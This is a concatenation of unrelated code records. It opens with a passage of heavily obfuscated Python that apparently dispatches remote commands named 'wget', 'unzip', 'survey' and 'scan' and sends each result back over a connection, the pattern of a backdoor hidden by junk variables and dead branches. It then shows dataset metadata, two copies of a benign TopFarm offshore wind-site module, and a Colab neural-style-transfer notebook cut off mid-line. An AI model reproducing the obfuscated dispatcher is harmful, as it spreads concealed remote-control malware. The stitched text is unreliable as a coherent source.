vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = 'AwDFzCsGFjzGACEOmySDwQCiEyJPzCGRFYtIEJEvwIHGbLxPCGxzzEwzIyqDimj'
HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG = 'SOaIJCzCzCzDsyCQxvqvvMzyqNssyRPhQSSPQeznJjwFDpDFUDSxzoySJQRSBzz'
IPSPPCtASuDAqzRyzASuEAmyRFEynItoDzxzWNeCZyQjuErvADuvUztIPODMRAD = 'GtzHAkDxFYVBOsIRwSjXqGtnQHkxElvzJHzNsoewuEoYARIqzOpFAISxGJrtIJJ'
REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk = 'uzASCIsSFxvIjkwMyBuojmFegEGzFyCwDBttpSwdrvjpEzAGExCnxuEBkODtPQt'
if JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS in vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR:
JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS = REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk
if vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR in HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG:
vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = IPSPPCtASuDAqzRyzASuEAmyRFEynItoDzxzWNeCZyQjuErvADuvUztIPODMRAD
elif vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR in JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS:
HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG = vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR
if HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG in vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR:
vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu(nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'wget':
try:
IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq = 'HPeFnEpBuzkvmmJIRIChUqPNzSQFuMTuJTGwJnBPWvWSAAPnDymkGUxfmsFvOlQ'
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = 'ZOTCiFImprRXJPSFIDzDERDvSxBLDDxeqBxEAwFPyQFrDMGxQkESFQqGzAvMAMp'
PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL = 'NBFSIOtVYJzGQDCQJzHANrRuiIiuyJHJROSBUutrISxQrNuXbHOJNrWmOvHImG'
RxOSsgyMDBtREEESQICgisGyJEJMvsIlPXxSSOyZISZHyIxrGRrInGODnCSGDGv = 'GhnvrEJPqxwptACEyIZIzOxrvVCCPnSAiLBhZSDWuuJDCpHuzJGgyGJpCRAoRJZ'
MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr = 'QlnhvnNFSSOOiMPIJkCIDPDwmyHRxxNRJJdBkIpJmWGdteHAAHyPpqOFSGHyPpz'
SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD = 'DEYHFSySAuzBTqFmCOwQqNIAHxSNZHxIFiJzqzmBAxIHPBJsixyIPtQtRQPsxAI'
EStBIXXOHkGCEiePoUuEtEzPiHIASBFCJoIQviVkQwrspFDxhwCRIlTHnvmCgPr = [
'HPeFnEpBuzkvmmJIRIChUqPNzSQFuMTuJTGwJnBPWvWSAAPnDymkGUxfmsFvOlQ',
'NBFSIOtVYJzGQDCQJzHANrRuiIiuyJHJROSBUutrISxQrNuXbHOJNrWmOvHImG',
'QlnhvnNFSSOOiMPIJkCIDPDwmyHRxxNRJJdBkIpJmWGdteHAAHyPpqOFSGHyPpz',
'vBqAmGCsoSzhRrHnQRJFwvypFRCUoDFODeRxYkOwQJwwNwClRHGGRzXFGHTqToE'
]
for IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq in SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD:
for rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ in PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL:
if RxOSsgyMDBtREEESQICgisGyJEJMvsIlPXxSSOyZISZHyIxrGRrInGODnCSGDGv == MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr:
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq
elif MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr == rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ:
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD
else:
MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr = SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD
for rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ in EStBIXXOHkGCEiePoUuEtEzPiHIASBFCJoIQviVkQwrspFDxhwCRIlTHnvmCgPr:
PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL = rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ
except Exception:
pass
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'unzip':
xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA = 'IPYmmDApGpHDJuIDzPUyFIErBtFnoPvTGwGCPJvEGtCwPESnHFSSntelypSJqFS'
EDNmwEIToFONuTQPbNHOGJzHDvCZomFtrJDzlwnxQfXIyHFJEFqGYPIOpfSCFV = 'XDpCMpBGCADaCuZSpGDGJORBRRGJAUITlGVIFJIfDJJFFlIxZDHSGIRrYmAIQmm'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
if xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA == EDNmwEIToFONuTQPbNHOGJzHDvCZomFtrJDzlwnxQfXIyHFJEFqGYPIOpfSCFV:
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA
else:
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'IPYmmDApGpHDJuIDzPUyFIErBtFnoPvTGwGCPJvEGtCwPESnHFSSntelypSJqFS'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'survey':
AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ = 'QAGqucjBZBDVRVDIzShoQEvJDOYmrMQwqCqwMFDXHSvrBADNjXEtGFsBJHNpCFy'
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = 'JTEoQBPPDxlHCzfFmMAnusEeOHOvkFPJNwHFRlGmByHNISSzruJGkAxJfLYHtoj'
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = 'tEgEuHGRRsSIpptqeyMIQARxsAlbBMzNSSHyYHHAJCGESwqRxzHIQRPBsyyhrAD'
ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS = 'PGDutFDPGDABYJWDHGyIMsSOCRtstqWNCezsBAnPFATgCACRnIDDGAIFznEZHPC'
LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ = 'JnRSwPzwJBZxsVquwEzPxIFdqCGIwxMTwSCxIHSJNDiVWGtjsyHRILsyRwIeuf'
hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ = 'EBCgrkLpblOlvZFEGrvlHoMsvGFzDQJzivxePBqICBRhOnvRCEFLAHAQPJRBArF'
if AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ != ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS:
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt
for hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ in ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS:
if hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ != BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt:
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP
else:
LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
else:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ = LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ
if BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt == AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ:
for hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ in AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ:
if hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ == BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
else:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu(nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'scan':
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'BTYiFCByPQxnYCCDkVEvNIBkqQVyjAivwqyQjQHhNwWVDwPHsDyJvGpntwtrJAm'
xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI = 'jqoDziwshRpJFGGulPTDUJsDRjGvXIGoRwuLPxMTVIBkJXCHBEuzvkxzaIooSqu'
if AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE != xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI:
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'jqoDziwshRpJFGGulPTDUJsDRjGvXIGoRwuLPxMTVIBkJXCHBEuzvkxzaIooSqu'
xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI = AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'BTYiFCByPQxnYCCDkVEvNIBkqQVyjAivwqyQjQHhNwWVDwPHsDyJvGpntwtrJAm'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
if __name__ == '__main__':
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = 'BiXAsAGtySJhFpAMxEfvysvhDOHCIyqIGlSAQPJOJoCzzYrZAmxtmwBAHRzzqpE'
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = 'oyFlgGRGBBzPuPHhPFACIQmEyDmjiGPXGqvPArPJsOlGQxSeuTvuJCCDmxAgIBu'
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = 'tDIjJGFQBIIIIkMGysIIxQJyHiSxgEqqVxJJmAHErtuSQIsyzoHRlAvUzSBJpHp'
tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA = 'JHsFpPPFvIwYxPxSJVGAZrpxCFEPZWJudnPFBulvYDDiRHPGquEBPPsEOFQtDOx'
gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS = 'JFAXHSRHPQEuQZHBXAHBXjAxHlzTwJEHEzlExSGfxGSlsdFyFwHYzymSNttHouI'
if QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
if vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA
elif vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ:
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx
if jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF()
| 34,464 | 0 | 22 |
c608b7e78abd3f1e926ac291a49708e420d785ec | 2,057 | py | Python | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 4 | 2019-02-18T08:46:00.000Z | 2021-01-28T06:35:52.000Z | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 1 | 2019-11-26T12:12:12.000Z | 2019-11-26T12:12:12.000Z | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 8 | 2019-01-14T09:33:26.000Z | 2021-06-30T11:56:03.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 28 10:55:12 2021
@author: mikf
"""
import numpy as np
from py_wake.examples.data.ParqueFicticio import ParqueFicticio_path
from py_wake.site import WaspGridSite
from py_wake.site.xrsite import XRSite
x = np.asarray([262403., 262553., 262703., 262853., 263003., 263153., 263303.,
263453., 263603., 263753., 263903., 264053., 264203., 264353.,
264503., 264653., 264803., 264953., 265103., 265253.])
y = np.asarray([6504239., 6504389., 6504539., 6504689., 6504839., 6504989.,
6505139., 6505289., 6505439., 6505589., 6505739., 6505889.,
6506039., 6506189., 6506339., 6506489., 6506639., 6506789.,
6506939., 6507089.])
wt_x = np.asarray([264904, 264372, 263839, 264904, 264372, 263839, 263306,
264638, 264105, 263572, 263039, 264372, 263839, 263039, 264358,
263839, 263039, 263839, 263306, 262773, 263306, 262773, 263039])
wt_y = np.asarray([6505613, 6505016, 6504420, 6506063, 6505467, 6504870,
6504273, 6506215, 6505619, 6505022, 6504425, 6506368, 6505771,
6504876, 6506803, 6506221, 6505326, 6506672, 6506075, 6505478,
6506525, 6505929, 6506677])
x_min_d = x.min()
x_max_d = x.max()
y_min_d = y.min()
y_max_d = y.max()
boundary = np.asarray([[x_min_d, y_max_d], [x_max_d, y_max_d],
[x_max_d, y_min_d], [x_min_d, y_min_d]])
# NOTE(review): ParqueFicticioOffshore is not defined anywhere in this copy
# of the module, so running it as a script raises NameError -- the class is
# defined elsewhere. Confirm against the unfiltered source file.
if __name__ == '__main__':
    site = ParqueFicticioOffshore()
| 39.557692 | 83 | 0.613515 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 28 10:55:12 2021
@author: mikf
"""
import numpy as np
from py_wake.examples.data.ParqueFicticio import ParqueFicticio_path
from py_wake.site import WaspGridSite
from py_wake.site.xrsite import XRSite
# Resource-grid coordinate vectors: 20 points each at 150 m spacing
# (values look like UTM easting/northing in metres -- confirm CRS).
x = np.asarray([262403., 262553., 262703., 262853., 263003., 263153., 263303.,
                263453., 263603., 263753., 263903., 264053., 264203., 264353.,
                264503., 264653., 264803., 264953., 265103., 265253.])
y = np.asarray([6504239., 6504389., 6504539., 6504689., 6504839., 6504989.,
                6505139., 6505289., 6505439., 6505589., 6505739., 6505889.,
                6506039., 6506189., 6506339., 6506489., 6506639., 6506789.,
                6506939., 6507089.])
# Initial positions of the 23 wind turbines, same coordinate frame as x/y.
wt_x = np.asarray([264904, 264372, 263839, 264904, 264372, 263839, 263306,
                   264638, 264105, 263572, 263039, 264372, 263839, 263039, 264358,
                   263839, 263039, 263839, 263306, 262773, 263306, 262773, 263039])
wt_y = np.asarray([6505613, 6505016, 6504420, 6506063, 6505467, 6504870,
                   6504273, 6506215, 6505619, 6505022, 6504425, 6506368, 6505771,
                   6504876, 6506803, 6506221, 6505326, 6506672, 6506075, 6505478,
                   6506525, 6505929, 6506677])
# Axis-aligned bounding box of the grid, corners listed clockwise from the
# north-west corner; used as the site/optimization boundary polygon.
x_min_d = x.min()
x_max_d = x.max()
y_min_d = y.min()
y_max_d = y.max()
boundary = np.asarray([[x_min_d, y_max_d], [x_max_d, y_max_d],
                       [x_max_d, y_min_d], [x_min_d, y_min_d]])
class ParqueFicticioOffshore(WaspGridSite, XRSite):
    """Offshore variant of the py_wake ParqueFicticio example site.

    Loads the WAsP .grd resource data, derives a fictitious ``water_depth``
    field from the terrain elevation, drops the terrain-only variables and
    re-registers the result as a plain :class:`XRSite` on the module-level
    ``x``/``y`` grid. Also exposes ``boundary`` (rectangular domain corners)
    and ``initial_position`` (initial 23-turbine layout).
    """
    def __init__(self):
        # Load the WAsP grid files; pickle speed-up disabled so the data is
        # always re-read from the source .grd files.
        site = self.from_wasp_grd(ParqueFicticio_path, speedup_using_pickle=False)
        # Fake bathymetry: depth is the negated elevation scaled down by 10.
        # NOTE(review): the /10 factor looks like an arbitrary demo scaling
        # for this fictitious site -- confirm against the example's intent.
        site.ds['water_depth'] = - site.ds['Elevation'] / 10
        # Remove onshore/terrain-specific variables that have no meaning
        # for an offshore site.
        ds = site.ds.drop_vars(['flow_inc', 'ws_mean', 'orog_spd', 'Turning',
                                'Elevation', 'Speedup'])
        # Re-anchor the dataset on the module-level coordinate vectors.
        ds['x'] = x
        ds['y'] = y
        # Initialise directly as an XRSite so the modified dataset (rather
        # than the WaspGridSite grid machinery) backs this instance.
        XRSite.__init__(self, ds)
        self.boundary = boundary  # axis-aligned bounding box of the grid
        self.initial_position = np.array([wt_x, wt_y]).T  # shape (23, 2)
if __name__ == '__main__':
    # Smoke test: build the offshore site when the module is run directly.
    site = ParqueFicticioOffshore()
| 441 | 30 | 49 |
f59e767ecc296ece5f2f229615f34bfb6522912e | 44,883 | py | Python | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | # -*- coding: utf-8 -*-
"""Neural Style Pattern Transfer.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ijYjSvGfWm1aUkw0stn6P7U8pYwhsbU0
"""
#!nvcc --version
print("Your GPU is a ")
!nvidia-smi -L
print("GPU Logs")
print("Nvidia K80 is not enough to do past A5 for high res inputs and A7 for low res inputs")
print("Nvidia P100 will do an A8 in around 23 minutes")
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))
if ram_gb < 20:
